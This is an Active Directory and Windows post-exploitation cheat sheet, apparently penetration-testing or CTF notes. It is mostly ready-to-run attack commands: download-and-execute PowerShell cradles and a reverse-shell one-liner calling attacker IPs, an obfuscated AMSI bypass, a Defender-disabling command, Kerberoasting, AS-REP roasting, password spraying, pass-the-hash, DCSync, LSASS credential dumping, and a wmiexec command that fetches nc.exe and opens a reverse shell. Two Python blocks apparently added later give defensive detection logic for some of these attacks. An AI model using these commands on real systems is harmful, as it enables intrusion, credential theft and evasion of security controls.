Use PowerSploit/PrivEsc/PowerUp.ps1 to find potential privilege-escalation info
Check for non-Windows (unexpected) processes and listeners on Windows using netstat
Step 1: Check net user, admin and user rights
Step 2: Check whether PowerShell is available; if yes, run PowerUp.ps1, Sherlock.ps1 and JAWS.ps1.
Step 3: Try to get Meterpreter.
Step 4: Load mimikatz, try to bypass UAC, check SAM/SYSTEM etc.
Step 5: Check for unusual programs and registry entries.
Step 6: If the box is a Domain Controller - Enum - enum SMB users / LDAP users / BloodHound - GUI AD enum & Kerberos enum - brute-force attacking AD with LDAP & Kerberos
Step 7: Got creds - try psexec.py or crackmapexec - cheatsheet
Download rev Shells on the target
#download and execute the script
powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1')
#Run the shell in memory
powershell.exe iex(invoke-webrequest 'http://10.10.10.10:8001/powerrev.ps1' -UseBasicParsing)
powershell.exe iex(iwr 'http://10.10.10.10:8001/powerrev.ps1' -UseBasicParsing)
#download the rev shell on the target and save it
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1
#Another way of downloading a file
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
# Download and execute Automatically
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile -
#Powershell V3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1')
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1"); $r = $wr.GetResponse(); IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
More info from HackTricks (hacktricks.xyz)
PowerShell Reverse Shells
powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',5985);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
try the shell from this link
Local user Enum Using Net user
whoami /priv
whoami /groups
net user UserName /domain
net localgroup "Remote Management Users"
Basic AD Enum After Initial Access using AD Module
#Get Domain Details
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADclass::GetCurrentDomain()
#Loading AD Modules
Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module ActiveDirectory.psd1 -Verbose
User Enumeration
#View all users in Domain
get-aduser
#View all user properties
get-aduser -Identity kyomah -Properties *
#ALL user Objects
Get-ADUser -Filter * -Properties * |select -First 1 | Get-Member -MemberType *Property | select Name
#Find Last Password set date
Get-ADUser -Filter * -Properties * | select name, @{name='PasswordLastSet';expression={[datetime]::fromFileTime($_.pwdlastset)}}
#View Account Descriptions to check for stored passwords
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name,Description
#Finding user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Computer Enumeration
#view all computer names
Get-ADComputer -Filter * | select name
#Find servers running a given OS version (here Windows Server 2019)
Get-ADComputer -Filter 'OperatingSystem -like "*2019*"' -Properties OperatingSystem | select Name,OperatingSystem
#Check whether machines are online/pingable
Get-ADComputer -Filter * -Properties DNSHostName |%{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
User Groups Enumeration
#Find all groups in the Domain
Get-ADGroup -Filter * |select name
#Get verbose info about groups
Get-ADGroup -Filter * -Properties *
#Find Complete info about specific group
Get-ADGroup -Identity 'Enterprise Admins' -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"'| select Name
Group Membership Enum
#Find the members of a group
Get-ADGroupMember -Identity 'Enterprise Admins' -Recursive | select SamAccountName
#Find the groups a user is member of
Get-ADPrincipalGroupMembership -Identity UserName | select name
GPO Enumeration:
#Get GPO list in current domain
Get-gpo -all
#Restricted policy
Get-NetGPOGroup
#Finding OUS
Get-ADOrganizationalUnit -Filter * -Properties *
Forest Enumeration
#Domain Trust Mapping
Get-ADTrust -Identity steins.local
#Forest Details
Get-ADForest
Get-AdForest -Identity Steins.local
#Get all domains in current forest
(Get-ADForest).Domains
#Get all Global catalogs for current forest
Get-ADForest | select -ExpandProperty GlobalCatalogs
#Map Trusts of Forests
Get-ADTrust -Filter 'msDS-TrustForestTrustinfo -ne "$null"'
Basic AD Enum After Initial Access using PowerView
powershell.exe -ep bypass
Import-Module ./PowerView.ps1
#View all the computers in the domain
Get-DomainComputer | Select name
#List the users in the domain
Get-DomainUser
#View all the shares of the computers
Find-DomainShare
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Get-NetFileServer   #PowerView; Get-DomainFileServer in the dev branch
#List all groups on a machine:
Get-netlocalgroup -ComputerName steinsdc -ListGroups
#Find computers where members of a given group (here RDPUsers) have sessions
Invoke-UserHunter -GroupName "RDPUsers"
#Find Computers where domain admin is logged in
Invoke-UserHunter -Stealth
#Finding user accounts used as Service accounts
Get-NetUser -SPN
Finding machines with local admin access
In case SMB is disabled, import the script from https://jdhitsolutions.com/blog/wp-content/uploads/2011/07/get-wmiadmin.txt and run the commands below
Find-WMILocalAdminAccess -ComputerFile ./computers.txt -Verbose
Find-WMILocalAdminAccess -ComputerName starkt
LDAP Enumeration:
ldapsearch -x -h 10.10.10.10 -s base namingcontexts
ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt
Dumping passwords using LDAP (LAPS attribute ms-MCS-AdmPwd; only readable when its ACL is too permissive):
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
Domain Enumeration with rpcclient
#Enum using Null Session
rpcclient -U "" 10.10.10.10
#Login as a user
rpcclient -U USERNAME //10.10.10.10
#Find Users in the domain
rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10
#Find Domain Info
rpcclient -Uuser_Name%PASSWORD -c querydominfo 10.10.10.10
#Find Groups and their Alias
rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10
#Find more info using Alias and note SIDs
rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10
#Find more info using SIDs
rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105
#Reset other Users Password
rpcclient -U user1 //10.10.10.10 -c "setuserinfo2 USER2 23 'PASSWORD'"
Enum using RPCClient
rpcclient -U DOMAIN\\Username 10.10.10.10 #Enter pass
enumdomusers #Enumerate Domain Users
lookupnames username #Get user S-ID
queryuser user_id #Example queryuser 0x1f2
querydispinfo #Display users info
enumprivs #Enum Privileges
enumprinters #Enum Printers
Creds Sniffing when SMB Signing is not required/disabled
responder -I tun0 -F --lm -d -w -i KALI_IP
#then trigger an SMB connection from the target machine to the listener
net use \\10.10.14.239
#or access an SMB share from the target
OR
responder -I tun0 -rPv
#NTLMv2 Hash
hashcat -m 5600 hash ~/Downloads/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Find users with SPNs set on their accounts
#import the module and Find the users
Import-Module .\GetUserSPNs.ps1
or
#AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
or
#PowerView
Get-NetUser -SPN
#request the users ticket
powershell.exe -exec bypass -c "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPNNAME/hostname.steins.LOCAL:1433' "
Import-Module .\Invoke-Kerberoast.ps1
#Generate the hash
Invoke-Kerberoast -OutputFormat Hashcat
#Cracking the hash
hashcat -m 13100 -a 0 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule --force
or
hashcat -a 0 -m 13100 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force
or
hashcat -a 0 -m 13100 hash ~/Downloads/Tools/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force
List the users with SPN Set
sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark
GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark -outputfile hashes.txt -k
You can review the errors here: KRB_AP_ERR_BAD_INTEGRITY - the authenticator was encrypted with something other than the session key. The result is that the client cannot decrypt the resulting message. The modification of the message could be the result of an attack or it could be because of network noise.
#Create ccache file
getTGT.py -dc-ip 10.10.10.10 Steins.local/mark
export KRB5CCNAME=mark.ccache
Brute Forcing Kerberos
kerbrute userenum --dc 10.10.10.10 -d steins.local users.txt
Download Kerbrute from here
kerbrute userenum --domain htb.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.10
ASREP Roast: Get users hash from a DoNotPre-Auth user
sudo GetNPUsers.py STEINS-DC.LOCAL/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.10.10.10
sudo john hash --format=krb5asrep --wordlist=rockyou.txt
# better copy rockyou.txt to the same location
ASREP Roast as an Authenticated user
python3 GetNPUsers.py steins.local/user:"password!" -dc-ip 10.10.10.10 -request
Updating Time to Match DC - KRB_AP_ERR_SKEW(Clock skew too great)
#Display the time of the server
proxychains net time -S 10.10.10.10
or
#Get DC time from curl response headers
proxychains curl DC_IP:5985 -v
sudo date -s "Thu Dec 24 HH:MM:SS YYYY"   #replace with the DC's date and time from the step above
Kerberoasting
.\Rubeus.exe kerberoast /domain:steins.local /user:username /format:hashcat /outfile:hash.txt
hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force
Kerberoast:
Save the TGS to disk and brute-force it :P. The DC identifies the service account by its ServicePrincipalName, but service account passwords are freaking hard to crack in most cases.
Finding user accounts used as service accounts: list SPNs
PowerView: Get-NetUser -SPN
AD: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Request a ticket (TGS): take the SPN name from the command above
#AD Module - get TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN_NAME/Steins.local"
#Check tokens and confirm the TGS
klist
#Saves the tickets from memory to DISK
Invoke-Mimikatz -Command '"Kerberos::list /export"'
#PowerView: supports JTR & hashcat
Request-SPNTicket
Old way of cracking Kerberos passwords
python tgscrack.py wordlist.txt hash_fileName
OR
# Requesting TGS (Ticket Granting Service)
GetUserSPNs.py steins.local/kyomah:Welcome@1 -dc-ip 192.168.227.144 -request
#Cracking Kerberos 5 TGS using hashcat
hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force
Targeted Kerberoasting - AS-REPs
#PowerView
Get-DomainUser -PreauthNotRequired -Verbose
#AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
OR check for users on which we can modify the ACL
---------------------------------------------- Searching for GenericAll Rights
#Finding users with enough permissions to modify ACLs (PowerView dev)
Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match "RDPUsers"}
#Changing the ACL of the user: disabling Kerberos pre-auth (PowerView)
Set-DomainObject -Identity USER_NAME -XOR @{useraccountcontrol=4194304} -Verbose
#Now the user should show up as not requiring pre-auth:
Get-DomainUser -PreauthNotRequired -Verbose
#Requesting AS-REP for offline bruteforcing:
https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 (deprecated)
Get-ASREPhash -Username USER_NAME -Verbose
OR
#use Asreproast to get the hash of the user account, remove all the spaces from the hash before bruteforcing
https://github.com/GhostPack/Rubeus#asreproast
Rubeus.exe asreproast /user:TestOU3user
OR
Rubeus.exe asreproast /user:Administrator /format:hashcat /outfile:hash.txt
#Copy the hash and crack it using JTR hashcat
john krbhash --wordlist=wordlist.txt
#Cracking using Hashcat; add $23 after $krb5asrep if you do not export the hash as hashcat format
hashcat -m 18200 hash -a 0 rockyou.txt
hashcat -m18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force
Abusing Kerberos with users who don't have SPNs
------------------------------------------------- Set SPN for the user and request TGS
#Searching for users with GenericAll permissions set (PowerView)
Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match "RDPUsers"}
#Find the user who doesn't have an SPN set already using the AD module:
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName
#Set an SPN for the user (must be unique in the domain)
PowerView: Set-DomainObject -Identity USER_NAME -Set @{serviceprincipalname='DomainName/SomeUniqueName'}
AD: Set-ADUser -Identity USER_NAME -ServicePrincipalNames @{Add='DomainName/SomeUniqueName'}
#Now if you check you should see SPN Set to the username
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName
Now request a TGS:
---------------------
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "DomainName/SomeUniqueName"
#check the TGS for DomainName/SomeUniqueName
klist
#Export the tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'
#Crack the TGS
python tgscrack.py wordlist.txt hash_fileName
Log generated is 4769
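On the detection side, the 4769 events just mentioned, together with the 4768 events behind the AS-REP roast section above, are what a defender correlates. The following is an added example, not part of these notes and not code from any of the tools named on this page: Python detection logic run over constructed 4768/4769 records. The event field names follow the Windows Security log; the thresholds, the pre-auth baseline and all account and host names are assumptions made for the example.

```python
"""Kerberoast (4769) and AS-REP roast (4768) detection over Security events.

Added example, not code from these notes. Event dicts carry the field names of
Windows events 4768/4769; thresholds, baseline and sample names are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}        # RC4-HMAC and RC4-HMAC-EXP (the crackable etypes)
KERBEROAST_MIN_SERVICES = 3          # distinct service accounts per window before alerting
WINDOW = timedelta(minutes=5)
# Accounts the domain legitimately runs without Kerberos pre-auth (assumed baseline).
PREAUTH_DISABLED_BASELINE = {"svc_legacy"}


def _ev(event_id, time, user, ip, **fields):
    """Build one constructed event record (not a real log line)."""
    rec = {"EventID": event_id, "Time": time, "TargetUserName": user, "IpAddress": ip, "Status": "0x0"}
    rec.update(fields)
    return rec


# In 4769 "ServiceName" is the service account name as Windows logs it, not the SPN string.
EVENTS = [
    # mark obtains RC4 tickets for three human-managed service accounts within seconds
    _ev(4769, "2024-01-10T09:00:01", "mark@STEINS.LOCAL", "10.10.10.50", ServiceName="svc_sql", TicketEncryptionType="0x17"),
    _ev(4769, "2024-01-10T09:00:02", "mark@STEINS.LOCAL", "10.10.10.50", ServiceName="svc_web", TicketEncryptionType="0x17"),
    _ev(4769, "2024-01-10T09:00:03", "mark@STEINS.LOCAL", "10.10.10.50", ServiceName="svc_backup", TicketEncryptionType="0x17"),
    # machine-account and krbtgt tickets are routine and excluded
    _ev(4769, "2024-01-10T09:00:04", "mark@STEINS.LOCAL", "10.10.10.50", ServiceName="FS01$", TicketEncryptionType="0x17"),
    _ev(4769, "2024-01-10T09:00:05", "mark@STEINS.LOCAL", "10.10.10.50", ServiceName="krbtgt", TicketEncryptionType="0x12"),
    # kyomah: one normal AES ticket
    _ev(4769, "2024-01-10T09:30:00", "kyomah@STEINS.LOCAL", "10.10.10.51", ServiceName="svc_sql", TicketEncryptionType="0x12"),
    # 4768 without pre-auth: one baseline account (RC4) and one account outside the baseline
    _ev(4768, "2024-01-10T09:05:00", "svc_legacy", "10.10.10.50", PreAuthType="0", TicketEncryptionType="0x17"),
    _ev(4768, "2024-01-10T09:06:00", "jorden", "10.10.10.50", PreAuthType="0", TicketEncryptionType="0x17"),
    # normal TGT request with PA-ENC-TIMESTAMP pre-auth
    _ev(4768, "2024-01-10T09:07:00", "mark", "10.10.10.50", PreAuthType="2", TicketEncryptionType="0x12"),
]


def is_machine_or_krbtgt(service_name):
    """Machine accounts (trailing $) and krbtgt have random keys; ignore them."""
    name = service_name.split("@")[0]
    return name.endswith("$") or name.lower() == "krbtgt"


def detect_kerberoast(events):
    """One alert per requesting account that pulled RC4 service tickets for
    KERBEROAST_MIN_SERVICES or more distinct service accounts within WINDOW."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        if e["TicketEncryptionType"].lower() not in RC4_ETYPES:
            continue
        if is_machine_or_krbtgt(e["ServiceName"]):
            continue
        per_user[e["TargetUserName"]].append(
            (datetime.fromisoformat(e["Time"]), e["ServiceName"], e["IpAddress"]))
    alerts = []
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _, ip) in enumerate(reqs):      # sliding window over sorted requests
            services = {svc for t, svc, _ in reqs[i:] if t - t0 <= WINDOW}
            if len(services) >= KERBEROAST_MIN_SERVICES:
                alerts.append({"user": user, "source_ip": ip, "start": t0.isoformat(),
                               "services": sorted(services)})
                break
    return alerts


def detect_asrep_roast(events, baseline=PREAUTH_DISABLED_BASELINE):
    """Flag 4768 events with Pre-Authentication Type 0 (no pre-auth). An account
    outside the baseline means DoesNotRequirePreAuth was changed on it; a baseline
    account handed an RC4 AS-REP is crackable offline."""
    alerts = []
    for e in events:
        if e["EventID"] != 4768 or e.get("PreAuthType") != "0":
            continue
        user = e["TargetUserName"].lower()
        if user not in baseline:
            reason = "preauth_disabled_outside_baseline"
        elif e["TicketEncryptionType"].lower() in RC4_ETYPES:
            reason = "rc4_asrep_for_preauth_disabled_account"
        else:
            continue
        alerts.append({"user": user, "source_ip": e["IpAddress"], "time": e["Time"], "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(EVENTS):
        print("kerberoast:", a)
    for a in detect_asrep_roast(EVENTS):
        print("asrep:", a)
```

The RC4 filter matters: a domain that has moved service accounts to AES keys produces 0x12 tickets, and the classic hashcat workflow on this page does not apply to those, so an RC4 ticket for a non-machine account is itself a signal worth keeping in the query.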
BloodHound-Python
If you have access to DC, need admin creds - Github
Linux:
proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp
Few files will appear in the same location, import them into bloodhound
Kali: apt-get install bloodhound
sudo neo4j console
go to localhost:7474
neo4j: neo4j #login in browser and change the password
bloodhound #bloodhoun login will pop-up, login with new creds
Windows:
Download this on Windows target: SharpHound.ps1
powershell -ep bypass
. .\SharpHound.ps1   #dot-source to load Invoke-BloodHound
invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip
invoke-Bloodhound -CollectionMethod LoggedOn -Verbose
or
SharpHound.exe -c All -d Steins.local --zipfilename test.zip
OR
.\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip -c All
open the file in bloodhound --> click on upload --> select file
For Testing:
git clone https://github.com/BloodHoundAD/BloodHound-Tools
cd DBCreator
pip install neo4j-driver
sudo pip3 install neo4j
python3 DBCreator.py
sudo neo4j console
dbconfig
Access other user's share
net use \\DC.STEINS.LOCAL\c$ /u:STEINS.LOCAL\admin 'P@$$W0rd!'
or
$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)
invoke-command -computername dc -scriptblock { dir C:\users\username\desktop } -credential $cred
Add a user to another group
Powerview:
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
Windows:
net group "Remote Admin Permissions" USERNAME /add /domain
Disable AntiVirus/ Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Disable AMSI
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Adding DoNotPre-Auth on target user
works only after logging in
Set-ADAccountControl -Identity jorden -doesnotrequirepreauth $true
Password Spraying
Import-Module PowerView.ps1
#list all domain users and save them to a text file
Get-DomainUser | select -ExpandProperty samaccountname | Out-File users.txt
Import-Module DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Password 'P@$$W0rd!' -OutFile sprayed-creds.txt
or
proxychains crackmapexec smb 10.10.10.10 -d steins.local -u users.txt -p 'p@$$w0rd1' --continue-on-success
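Both kerbrute userenum (in the Brute Forcing Kerberos section above) and the password-spray commands in this section leave distinctive traces on the DC: many failures from one source against many distinct accounts. As an added example that is not the notes' own code or the code of any tool named here, the following Python runs that detection logic over constructed 4625/4768/4771 records. The field names match the Windows Security log; the thresholds, the window size and the sample IPs and account names are assumptions. It also shows the distinction from single-account brute force, which is deliberately not flagged as a spray.

```python
"""Password-spray and Kerberos user-enumeration detection over Security events.

Added example, not code from these notes. Event dicts carry the field names of
Windows events 4625/4768/4771; thresholds, window and sample data are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_MIN_ACCOUNTS = 5       # distinct accounts with a wrong password from one source
ENUM_MIN_ACCOUNTS = 5        # distinct non-existent accounts probed from one source
WINDOW = timedelta(minutes=10)
BASE = datetime(2024, 1, 10, 10, 0, 0)


def _at(seconds):
    """Constructed timestamp: BASE plus an offset in seconds."""
    return (BASE + timedelta(seconds=seconds)).isoformat()


def _ev(event_id, time, ip, account, **fields):
    """Build one constructed event record (not a real log line)."""
    rec = {"EventID": event_id, "Time": time, "IpAddress": ip, "TargetUserName": account}
    rec.update(fields)
    return rec


EVENTS = [
    # Spray from 10.10.10.60: one wrong password each against six accounts,
    # partly over SMB (4625) and partly over Kerberos (4771)
    _ev(4625, _at(0), "10.10.10.60", "alice", Status="0xc000006d", SubStatus="0xc000006a"),
    _ev(4625, _at(10), "10.10.10.60", "bob", Status="0xc000006d", SubStatus="0xc000006a"),
    _ev(4625, _at(20), "10.10.10.60", "carol", Status="0xc000006d", SubStatus="0xc000006a"),
    _ev(4771, _at(30), "10.10.10.60", "dave", Status="0x18"),
    _ev(4771, _at(40), "10.10.10.60", "erin", Status="0x18"),
    _ev(4771, _at(50), "10.10.10.60", "frank", Status="0x18"),
    # Brute force from 10.10.10.77: one account, eight wrong passwords (not a spray)
    *[_ev(4625, _at(100 + 5 * i), "10.10.10.77", "administrator",
          Status="0xc000006d", SubStatus="0xc000006a") for i in range(8)],
    # kerbrute-style user enumeration from 10.10.10.62: names that do not exist
    *[_ev(4768, _at(200 + i), "10.10.10.62", f"probe{i}", Status="0x6") for i in range(8)],
    # One ordinary typo from a workstation, well below any threshold
    _ev(4625, _at(900), "10.10.10.90", "kyomah", Status="0xc000006d", SubStatus="0xc000006a"),
]


def is_bad_password(e):
    """4625 SubStatus 0xC000006A or 4771 Status 0x18: account exists, password wrong."""
    if e["EventID"] == 4625:
        return e.get("SubStatus", "").lower() == "0xc000006a"
    if e["EventID"] == 4771:
        return e.get("Status", "").lower() == "0x18"
    return False


def is_unknown_user(e):
    """4625 SubStatus 0xC0000064 or 4768 Status 0x6: the account does not exist."""
    if e["EventID"] == 4625:
        return e.get("SubStatus", "").lower() == "0xc0000064"
    if e["EventID"] == 4768:
        return e.get("Status", "").lower() == "0x6"
    return False


def sources_with_many_targets(events, predicate, min_accounts, window=WINDOW):
    """Group matching events by source IP and report each source that touched at
    least min_accounts distinct accounts inside some window-sized span. Counting
    distinct accounts (not attempts) is what separates a spray from brute force."""
    per_source = defaultdict(list)
    for e in events:
        if predicate(e):
            per_source[e["IpAddress"]].append(
                (datetime.fromisoformat(e["Time"]), e["TargetUserName"].lower()))
    alerts = []
    for ip, recs in sorted(per_source.items()):
        recs.sort()
        for i, (t0, _) in enumerate(recs):
            accounts = {acct for t, acct in recs[i:] if t - t0 <= window}
            if len(accounts) >= min_accounts:
                alerts.append({"source_ip": ip, "start": t0.isoformat(),
                               "distinct_accounts": len(accounts), "accounts": sorted(accounts)})
                break
    return alerts


def detect_password_spray(events):
    return sources_with_many_targets(events, is_bad_password, SPRAY_MIN_ACCOUNTS)


def detect_user_enumeration(events):
    return sources_with_many_targets(events, is_unknown_user, ENUM_MIN_ACCOUNTS)


if __name__ == "__main__":
    for a in detect_password_spray(EVENTS):
        print("password spray:", a)
    for a in detect_user_enumeration(EVENTS):
        print("user enumeration:", a)
```

Normalising SMB and Kerberos failures into one stream is the point: a spray tool that alternates protocols, or one that authenticates to the DC over LDAP/Kerberos while crackmapexec hits SMB, still adds up to one source hitting many accounts.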
Get User Account Details
net user UserName /domain
or
PowerShell Get-DomainUser UserName
Open a Shell using creds: if port 5985 is open
sudo evil-winrm -u USERNAME -p PASSWORD -i 10.10.10.10
or
evil-winrm -u username -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.10
or
psexec.py USERNAME@10.10.10.10
or
sudo secretsdump.py USERNAME@10.10.10.10
OR login to the machine and run:
.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
or
evil-winrm -i 10.10.10.10 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
or
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10
or
.\SharpDPAPI.exe machinecredentials
psexec.py Administrator@10.10.10.10 -hashes LMHASH:NTHASH
Cracking Passwords using ntds & system hive
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
#login as Admin using the hash
evil-winrm -H 9658dsa3t1d9250115e2205d9f48400d -u administrator -i 10.10.10.10
#For Clear Text Password
lsassy -d steins.local -u Administrator -H 9658dsa3t1d9250115e2205d9f48400d 10.10.10.10 -m 0 --procdump procdump.exe --dumpert dumpert.exe
#Download the hashes dump
secretsdump.py -just-dc-ntlm STEINS.LOCAL/administrator:"Password!"@10.10.10.10 -use-vss
Dumping Creds if you find lsass.dmp
mimikatz.exe
sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords full
Writable Directories
save exploits in below directories.
C:\Windows\System32\spool\drivers\color\
Running a Powershell Script on Target Machine
http://website.com/cmd.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33/pu.ps1')| powershell -noprofile -
RCE using wmiexec
proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"
Port Scan a Target Machine
Download Invoke-PortScan from here
PowerShell Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30 | Where { $_.Alive -eq "True" }
Enumerating AD Recycle Bin Group
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
#Now check for users passwords. might come in handy sometimes
Get-ADObject -filter { SAMAccountName -eq "UserName" } -includeDeletedObjects -property *